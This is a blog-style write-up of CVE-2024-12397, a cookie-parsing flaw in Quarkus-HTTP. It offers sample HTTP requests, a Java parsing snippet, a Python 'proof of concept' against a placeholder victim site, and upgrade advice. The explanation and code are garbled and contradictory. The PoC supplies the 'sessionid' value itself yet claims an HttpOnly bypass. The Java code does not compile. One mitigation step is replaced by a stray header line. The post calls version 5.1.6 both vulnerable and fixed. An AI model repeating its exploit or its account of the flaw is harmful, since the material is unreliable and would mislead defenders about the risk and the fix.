CVE-2024-12397 - How a Cookie Parsing Bug in Quarkus-HTTP Can Leak Secret Cookies

A high-impact security flaw, CVE-2024-12397, was found in Quarkus-HTTP, a popular foundational HTTP library used by Quarkus, the “supersonic, subatomic Java” framework. This vulnerability allows attackers to trick the HTTP parser into leaking or spoofing cookie values — even for cookies set as HttpOnly (the kind you never want exposed to the browser!). If you’re running microservices, APIs, or web apps on Quarkus, this is a must-read!

Let’s break down what the bug does, walk through a simple exploit, and look at how you can fix or spot this issue.

What’s The Problem?

Cookies are tiny pieces of data stored on your browser and sent with every request to a site. Sensitive cookies, like session IDs, are often marked with HttpOnly — which should mean JavaScript can’t touch them. However, the underlying HTTP library (Quarkus-HTTP <= 5.1.6) incorrectly interprets requests containing some funky cookie delimiters. This allows bad actors to combine their own cookie with values meant to be secret, tricking your app into leaking or rewriting data it shouldn’t.

IMPACT:

Normally, cookies are sent like this

GET / HTTP/1.1
Host: target.example.com
Cookie: sessionid=ABC123; theme=dark

But some HTTP parsers don’t handle sneaky delimiters, like commas or semicolons inside cookie values. The Quarkus-HTTP bug makes it misread the contents, accidentally joining up cookie values or accidentally leaking data into an attacker’s controlled area.

Example vulnerable code snippet

// Typical cookie parsing logic
String cookieHeader = request.getHeader("Cookie");
String[] cookies = cookieHeader.split(";");
for (String cookie : cookies) {
    String[] parts = cookie.split("=", 2);
    String name = parts[].trim();
    String value = parts.length > 1 ? parts[1].trim() : "";
    // ...store or lookup cookie by name
}

If an attacker crafts a cookie like:

Cookie: attacker=foo; sessionid=SECRET; another=bar

The parser *should* only give the “attacker” value to untrusted code, but may (mistakenly) let the attacker see “sessionid=SECRET” by joining or splitting improperly.

Let’s say a site uses the following Java REST endpoint to read a “note” cookie

@GET
@Path("/read-cookie")
public String readCookie(@CookieParam("note") String note) {
    return "Note: " + note;
}

You don’t want to leak your sessionid cookie, which is set as HttpOnly.

An attacker sends

GET /read-cookie HTTP/1.1
Host: victim.site.com
Cookie: note=my_note; sessionid=SHOULD_BE_HIDDEN

In Quarkus-HTTP (vulnerable), if the code isn't careful, the note variable gets

"my_note; sessionid=SHOULD_BE_HIDDEN"

The attacker just exfiltrated your session cookie!

Now, imagine sending

Cookie: note=...; sessionid=STEALME

to a page that blindly prints or stores the parsed note value somewhere public or sends it back in a header.

Proof of Concept (PoC)

Below is a minimal exploit using Python’s requests to grab HttpOnly data:

import requests

# Attacker crafts a malicious Cookie header
cookies = {
    'note': 'my_note',
    'sessionid': 'STEALME'
}

# Send request to vulnerable endpoint
resp = requests.get("https://victim.site.com/read-cookie";, cookies=cookies)

# Attacker examines returned value
print(resp.text)
# e.g.: "Note: my_note; sessionid=STEALME"

If the page returns the value including sessionid, it’s vulnerable!

How to Fix

Upgrade immediately!
The Quarkus-HTTP team fixed this issue in version 5.1.6.Final, and newer Quarkus versions bundle the patch, too.

Mitigation steps

1. Update Quarkus-HTTP in your project (see GitHub advisory).

Cookie: a=b; sessionid=leak

3. Don’t trust cookie values blindly — sanitize and separate cookies yourself if handling raw headers.

References

- Quarkus-HTTP Security Advisory
- CVE-2024-12397 on NVD
- Official Quarkus Patch Release
- OWASP Secure Cookie Guidelines

Recap

CVE-2024-12397 isn’t just a bug, it’s a serious risk — leaking your secret cookies is never okay. With a single crafted request, attackers can bypass HttpOnly protections, potentially accessing or tampering with user sessions.

If you run Quarkus apps, check your dependencies now and upgrade to the patched version! And always be careful when parsing cookies, no matter what tech stack you’re on.


*Like this post? Share it or leave feedback — and stay safe on the modern web!*

Timeline

Published on: 12/12/2024 09:15:05 UTC
Last modified on: 12/13/2024 10:24:58 UTC